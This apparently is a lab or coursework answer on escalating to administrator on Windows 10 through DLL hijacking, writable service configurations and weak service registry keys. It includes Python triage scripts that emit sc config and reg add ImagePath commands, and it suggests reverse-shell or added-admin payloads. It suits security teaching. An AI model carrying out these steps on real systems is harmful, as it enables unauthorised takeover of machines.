Task 4(a): Exploiting DLL Hijacking Vulnerability to Gain Administrative Privileges on Windows 10

1. DLL Hijacking

DLL Hijacking occurs when an application loads a malicious DLL instead of the legitimate one. Here’s how
it can be done:

Steps:

1. Identify the Vulnerable Application: Confirm that the Patient App Service
(C:\Program files\myPatientApp.exe) loads a DLL from its own directory, or searches for a
DLL that does not exist on disk. Use Process Monitor, filtered on the process name, the
CreateFile operation and a NAME NOT FOUND result for paths ending in .dll, to see which DLLs
the application looks for and in which order; Dependency Walker or a PE viewer lists the
statically imported DLL names.

o Techniques:

 Monitor the application startup process to identify all DLLs being loaded.

 Confirm that the service runs with elevated privileges (typically LocalSystem or another
service account), for example from the Log On As column in services.msc or the service's
query configuration; a hijack only yields the privileges of the host process.

2. Create a Malicious DLL: Develop a DLL with the same name as the legitimate one, containing
malicious code to execute with the application's privileges. This DLL will execute code to elevate
privileges or create a backdoor.

o Techniques:

 Write the DLL in C/C++. Place the payload in DllMain on DLL_PROCESS_ATTACH, keep it
loader-safe (spawn a separate process rather than doing heavy work under the loader lock),
and if the malicious DLL replaces one the application actually imports, export the same
function names or forward them to the original so the application still loads.

 Include code to add a new administrative user or execute a reverse shell.

3. Replace or Place the Malicious DLL: Place the malicious DLL in the application directory
(C:\Program files\) or in a writable directory that the DLL search order reaches before the
legitimate copy. By default C:\Program Files is not writable by standard users, so this step
depends on an ACL weakened by the installer, or on a missing DLL whose search falls through to
a directory you can write to.

o Techniques:

 Match the file name exactly and position the DLL where it will be loaded first,
overriding the original or pre-empting it in the search order.

 Confirm the path is not covered by Windows Resource Protection (which protects OS
files under the Windows directories, not third-party application directories) and that
the application does not verify the DLL's signature before loading it.

4. Execute the Application: Once the application runs, it will load the malicious DLL, granting the
attacker the application's privileges, which may include administrative privileges.

o Techniques:

 Restart the application manually, through a script, or by stopping and starting the
service, so that it loads the malicious DLL. If you lack the right to restart the service, a
reboot or the service's next scheduled start triggers the load.

 Use a scheduled task to ensure the application runs and loads the malicious DLL
at a specified time.

Tools: DLL Creator tools, Metasploit’s msfvenom for creating malicious payloads. Other Tools: Custom
scripting, C/C++ for writing DLLs.
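
The Process Monitor triage in step 1 is tedious by hand, so the following Python script is added here as an example (not part of the original document). It reads a Procmon CSV export and lists, for the target process, every DLL that was searched for and not found (a missing-DLL hijack) or loaded from a writable non-system directory (a replace/proxy hijack), tagging each with whether the directory is actually writable. The CSV rows, the process name and the writable-directory list are constructed; the column names are assumed to match Procmon's default CSV export, and on a real host the writable list would come from accesschk or icacls.

```python
"""Triage a Process Monitor CSV export for DLL hijacking candidates.
Added example; the CSV rows and the writable-directory list are constructed,
and the column names are assumed to follow Procmon's default CSV export."""
import csv
import io

PROCMON_CSV = r'''"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"10:02:13.4412","myPatientApp.exe","4120","CreateFile","C:\Program Files\myPatientApp.exe","SUCCESS","Desired Access: Execute/Traverse"
"10:02:13.4420","myPatientApp.exe","4120","CreateFile","C:\Program Files\reportgen.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"10:02:13.4425","myPatientApp.exe","4120","CreateFile","C:\Windows\System32\reportgen.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"10:02:13.4428","myPatientApp.exe","4120","CreateFile","C:\Windows\System\reportgen.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"10:02:13.4430","myPatientApp.exe","4120","CreateFile","C:\Windows\reportgen.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"10:02:13.4435","myPatientApp.exe","4120","CreateFile","C:\PatientAppData\plugins\reportgen.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"10:02:13.4440","myPatientApp.exe","4120","CreateFile","C:\PatientAppData\plugins\telemetry.dll","SUCCESS","Desired Access: Read Data/List Directory, Execute/Traverse"
"10:02:13.4445","myPatientApp.exe","4120","CreateFile","C:\Windows\System32\kernel32.dll","SUCCESS","Desired Access: Read Attributes"
"10:02:13.4450","myPatientApp.exe","4120","CreateFile","C:\Program Files\config.ini","NAME NOT FOUND","Desired Access: Generic Read"
"10:02:13.4460","svchost.exe","912","CreateFile","C:\Windows\System32\missing.dll","NAME NOT FOUND","Desired Access: Read Attributes"
'''

# Directories the low-privileged user can write to (constructed). C:\Program Files is
# deliberately absent: standard users cannot write there by default.
WRITABLE_DIRS = [r"C:\PatientAppData\plugins", r"C:\Users\Public"]

SYSTEM_ROOT = r"c:\windows"


def find_dll_hijack_candidates(csv_text, process_name, writable_dirs):
    """Return every DLL the process looked for and did not find ("missing") or loaded
    from a writable non-system directory ("present"), tagged with writability."""
    writable = {d.lower().rstrip("\\") for d in writable_dirs}
    candidates = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row["Process Name"].lower() != process_name.lower():
            continue
        if row["Operation"] != "CreateFile" or not row["Path"].lower().endswith(".dll"):
            continue
        directory = row["Path"].rsplit("\\", 1)[0]
        is_writable = directory.lower() in writable
        if row["Result"] in ("NAME NOT FOUND", "PATH NOT FOUND"):
            candidates.append({"path": row["Path"], "kind": "missing", "writable": is_writable})
        elif row["Result"] == "SUCCESS" and is_writable \
                and not directory.lower().startswith(SYSTEM_ROOT):
            candidates.append({"path": row["Path"], "kind": "present", "writable": True})
    return candidates


def exploitable(candidates):
    """Only candidates in a writable directory are usable from a standard user account."""
    return [c["path"] for c in candidates if c["writable"]]


if __name__ == "__main__":
    found = find_dll_hijack_candidates(PROCMON_CSV, "myPatientApp.exe", WRITABLE_DIRS)
    for c in found:
        print(f'{c["kind"]:8} writable={c["writable"]!s:5} {c["path"]}')
    print("exploitable:", exploitable(found))
```

In the constructed rows the application's own directory is searched first and is not writable, so the usable entries are the two under C:\PatientAppData\plugins: a missing reportgen.dll that can simply be dropped in, and a telemetry.dll that is loaded successfully and could be replaced or proxied.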

2. Exploiting Insecure Service Permissions (Most Effective)

This method involves exploiting a service that runs with elevated privileges but has misconfigured
permissions allowing modifications.

Steps:

1. Identify the Service: Use tools to identify services with misconfigured permissions. The Patient
App Service should be checked for permission issues.

o Techniques:

 Use enumeration tools like Accesschk to list all services and their permissions.

 Identify services running with SYSTEM or administrative privileges.

2. Check Service Permissions: Determine if you have write permissions to the service binary path
or parameters.

o Techniques:

 Use tools like Accesschk to check for writable permissions on the service
executable and its directory.

 Verify SERVICE_CHANGE_CONFIG or SERVICE_ALL_ACCESS on the service object, which allow
the binary path to be rewritten directly, and WRITE_DAC or WRITE_OWNER, which allow
the DACL to be changed so that those rights can be granted.

3. Modify the Service Path or Parameters: If writable, change the binary path to point to a
malicious executable or change parameters to load a malicious DLL.

o Techniques:

 Modify the ImagePath of the service to point to a malicious executable, using sc config
with the binPath= parameter or a PowerShell script.

 Change the service configuration using sc or registry editing so that it loads a
malicious DLL instead (for a svchost-hosted service, the ServiceDll value under the
service's Parameters key).

4. Restart the Service: Restart the service to execute the malicious code with elevated privileges.

o Techniques:

 Use net stop and net start (or sc stop and sc start) to restart the service; this
requires SERVICE_STOP and SERVICE_START on that service. With only SERVICE_CHANGE_CONFIG,
the new binary runs at the next reboot or scheduled start.

 Schedule a task to restart the service if immediate restart is not possible.

Tools: Accesschk from Sysinternals for checking service permissions. Other Tools: PowerShell scripts,
Metasploit for service exploitation, Process Hacker.

Extra Detail:

 Enumeration: Use tools like accesschk to enumerate service permissions thoroughly. Look for
SERVICE_CHANGE_CONFIG or SERVICE_ALL_ACCESS granted to a low-privileged group, and for WRITE_DAC or
WRITE_OWNER, which allow the DACL to be rewritten to obtain those rights.

 Modification: Use sc config or similar commands to change the binary path or parameters of the
service. This can involve editing the registry or using administrative tools.

 Execution: Use system tools or commands to restart the service, ensuring the malicious code
executes.

3. Exploiting Weak Registry Permissions

Windows services often have registry entries that define how they operate. If these registry entries have
weak permissions, they can be exploited to escalate privileges.

Steps:

1. Identify Vulnerable Registry Entries: Locate the registry keys associated with the Patient App
Service using tools that can enumerate registry permissions, such as Accesschk or Regshot.

o Techniques:

 Use registry enumeration tools to list keys and permissions.

 Identify registry keys that control service execution, typically found in
HKLM\SYSTEM\CurrentControlSet\Services\.

2. Check Registry Key Permissions: Verify if the permissions on the registry keys allow
modification.

o Techniques:

 Check for Full Control or Write permissions on registry keys using tools like
Accesschk.

 Use registry editing tools to verify who can modify the keys.

3. Modify the Registry Entry: Change the registry entry to point to a malicious executable or script.

o Techniques:

 Modify ImagePath or similar values in the registry to a malicious executable
using Regedit or the reg command line tool.

 Change other relevant keys to ensure execution of malicious code.

4. Trigger the Service: Restart the service or trigger it in a way that it executes the malicious code
from the modified registry entry.

o Techniques:

 Restart the system to ensure the service runs with the modified registry keys.

 Use scheduled tasks or service control commands to trigger the service.

Tools: Accesschk for checking registry permissions, Regedit for manual editing. Other Tools: PowerShell
scripts, Metasploit for registry exploitation.

Additional Details:

 Enumeration: Carefully enumerate the service-related registry keys for permission issues using
tools like Accesschk and Regshot.

 Modification: Modify the ImagePath or other relevant values in the registry to point to a
malicious executable. Ensure changes are correctly applied.

 Execution: Ensure that the service restart or system reboot triggers the execution of the
malicious code by setting appropriate triggers and ensuring the service restarts correctly.
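
Methods 2 and 3 both come down to reading accesschk output and deciding which rights are exploitable, so one added example serves both (it is not part of the original document). The Python script below groups accesschk's per-object listing into (object, rights) pairs, separates rights that allow the service's binary path or ImagePath to be rewritten directly (SERVICE_CHANGE_CONFIG, SERVICE_ALL_ACCESS, KEY_SET_VALUE, KEY_ALL_ACCESS) from those that only allow the DACL to be rewritten first (WRITE_DAC, WRITE_OWNER), notes whether the service can be restarted without a reboot, and prints the corresponding sc config or reg add step. The sample output is constructed in the shape of accesschk -v results for Authenticated Users, with a services run (-c) and a registry-key run (-k) concatenated; the exact formatting is an assumption, as is the payload placeholder.

```python
"""Triage accesschk output for service and service-registry-key permissions that
allow privilege escalation. Added example; the sample is constructed in the shape
of accesschk -v output (services and registry keys concatenated), not a real host."""
import re

SERVICE_WRITE = {"SERVICE_ALL_ACCESS", "SERVICE_CHANGE_CONFIG", "GENERIC_ALL", "GENERIC_WRITE"}
KEY_WRITE = {"KEY_ALL_ACCESS", "KEY_SET_VALUE", "KEY_WRITE", "GENERIC_ALL", "GENERIC_WRITE"}
DACL_WRITE = {"WRITE_DAC", "WRITE_OWNER"}   # let you grant yourself the rights above

HEADER_RE = re.compile(r"^(R?W?)\s+(\S.*)$")

SAMPLE_ACCESSCHK = r"""
RW PatientAppService
        SERVICE_ALL_ACCESS
RW LegacyUpdater
        SERVICE_QUERY_STATUS
        SERVICE_QUERY_CONFIG
        WRITE_DAC
R  Dnscache
        SERVICE_QUERY_STATUS
        SERVICE_QUERY_CONFIG
RW HKLM\SYSTEM\CurrentControlSet\Services\PatientAppService
        KEY_ALL_ACCESS
R  HKLM\SYSTEM\CurrentControlSet\Services\Dnscache
        KEY_READ
"""


def parse_accesschk(text):
    """Group the output into (object name, set of rights). Object lines start in
    column 0 with the R/W summary flags; their rights are indented beneath them."""
    objects = []
    for line in text.splitlines():
        if not line.strip():
            continue
        if line[0] != " ":
            match = HEADER_RE.match(line)
            if match:
                objects.append((match.group(2).strip(), set()))
        elif objects:
            objects[-1][1].add(line.strip())
    return objects


def triage(objects):
    """Flag services and keys whose rights let a low-privileged user redirect what
    runs as the service, and say how the redirect would be performed."""
    findings = []
    for name, rights in objects:
        is_key = name.upper().startswith(("HKLM\\", "HKEY_"))
        direct = rights & (KEY_WRITE if is_key else SERVICE_WRITE)
        via_dacl = rights & DACL_WRITE
        if not direct and not via_dacl:
            continue
        if is_key:
            # ImagePath is REG_EXPAND_SZ; <payload.exe> is a placeholder, not a real path.
            step = f'reg add "{name}" /v ImagePath /t REG_EXPAND_SZ /d "<payload.exe>" /f'
            can_restart = None   # key access says nothing about start/stop rights
        else:
            step = f'sc config "{name}" binPath= "<payload.exe>"'
            can_restart = ("SERVICE_ALL_ACCESS" in rights
                           or {"SERVICE_START", "SERVICE_STOP"} <= rights)
        if via_dacl and not direct:
            step = "rewrite the DACL to grant yourself write access first, then: " + step
        findings.append({
            "object": name,
            "kind": "registry key" if is_key else "service",
            "direct": sorted(direct),
            "via_dacl": sorted(via_dacl),
            "can_restart": can_restart,   # False: wait for a reboot or scheduled start
            "next_step": step,
        })
    return findings


if __name__ == "__main__":
    for finding in triage(parse_accesschk(SAMPLE_ACCESSCHK)):
        print(finding)
```

Run accesschk twice on the target (once for services, once for the Services registry subtree), concatenate the output and feed it to parse_accesschk; a finding with can_restart False is still exploitable, it just needs a reboot or the service's next scheduled start to execute the new path.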

By focusing on these methods, particularly exploiting insecure service permissions, you can effectively
gain administrative privileges on a Windows 10 computer by leveraging the vulnerabilities in the Patient
App Service.
